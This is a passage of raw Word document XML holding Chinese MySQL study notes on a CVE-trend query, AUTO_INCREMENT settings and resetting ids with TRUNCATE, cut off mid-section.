          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t xml:space="preserve">  (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t xml:space="preserve"> cve_id  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>`cve_trends`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>`twitter_trends`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>where</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t xml:space="preserve"> created_at &gt;= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>'2023-5-8 17:25:00'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t xml:space="preserve"> e2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>group</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t xml:space="preserve"> e2.cve_id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>order</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t xml:space="preserve"> d </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>desc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201881A1" w14:textId="77777777" w:rsidR="00A95593" w:rsidRPr="00A95593" w:rsidRDefault="00A95593" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61891559" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="85" w:name="_Toc159779546"/>
      <w:r>
        <w:t>AUTO_INCREMENT</w:t>
      </w:r>
      <w:r>
        <w:t>详解（含</w:t>
      </w:r>
      <w:r>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:t>值、初始值、指定值等说明）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="85"/>
    </w:p>
    <w:p w14:paraId="6304EC71" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EEFA795" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://learn.blog.csdn.net/article/details/100548315</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFCD49F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3075BB45" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:t>可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>AUTO_INCREMENT</w:t>
      </w:r>
      <w:r>
        <w:t>关键字，实现列数据自增。一般用于单表的唯一标识列，常见的有主键。每张表最多只能有一个自增列。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9E01EF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BBD0CAF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9C6DC3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>CREATE TABLE `test` (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522BCA06" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  `k` BIGINT(19) UNSIGNED NOT NULL AUTO_INCREMENT,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F22F81" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  `name` VARCHAR(64) NOT NULL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A155437" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  PRIMARY KEY (`k`),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4C6844" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  UNIQUE KEY `key_name` (`name`)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6148F1EF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46765A21" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="456C8AF1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>设置</w:t>
      </w:r>
      <w:r>
        <w:t>AUTO_INCREMENT</w:t>
      </w:r>
      <w:r>
        <w:t>的列，需为整数或浮点数据类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701B090E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>自增列需设置为NOT NULL，否则会直接存储NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58373F31" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A802439" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="86" w:name="_Toc159779547"/>
      <w:r>
        <w:t>初始值</w:t>
      </w:r>
      <w:bookmarkEnd w:id="86"/>
    </w:p>
    <w:p w14:paraId="00FA8E5B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>自增列默认是从</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>开始，即插入第一行数据默认是</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2733DEE6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>可在建表时设置</w:t>
      </w:r>
      <w:r>
        <w:t>AUTO_INCREMENT=n</w:t>
      </w:r>
      <w:r>
        <w:t>，指定一个自增的初始值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFAECFC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34622CD8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>CREATE TABLEtest(...) AUTO_INCREMENT=10</w:t>
      </w:r>
      <w:r>
        <w:t>，表示自增列从</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>开始自增。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355F1986" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C62EA9C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>也可以通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ALTER TABLE test auto_increment = n</w:t>
      </w:r>
      <w:r>
        <w:t>来设置，但这样下次插入的值是</w:t>
      </w:r>
      <w:r>
        <w:t>n+1</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CF11FE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37F1F8A8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>数据量大的时候性能比较差</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DD09C7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32CCF70D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C2E8CCE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="87" w:name="_Toc159779548"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何让表的自增</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开始</w:t>
      </w:r>
      <w:bookmarkEnd w:id="87"/>
    </w:p>
    <w:p w14:paraId="20DCA7EF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C234148" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>情景：你在一个旧表上，创建某个列的时候</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> AUTO_INCREMENT COMMENT '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自增</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">id', </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后表跑了不少数据，你再</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">delete from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>表名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，将数据删除。但是再插入新的数据，你会发现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并非从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开始计数，而是从删除的数据的最大</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开始计数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8C4F9A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44D6CF17" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>清空某个表，然后让他的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重新从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开始计数自增。即命令：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>truncate table xxx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD380D7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>DELETE FROM sca.license_map;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7002AFFD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>truncate table sca.license_map;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32266EBA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0772AC1E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5541A681" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="88" w:name="_Toc159779549"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>记录数据插入或者修改的时间</w:t>
      </w:r>
      <w:bookmarkEnd w:id="88"/>
    </w:p>
    <w:p w14:paraId="529D9820" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://blog.csdn.net/weixin_39716877/article/details/113110056</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E1E7BC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F83BE30" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新建表的时候，创建列</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>uptime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C23F554" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
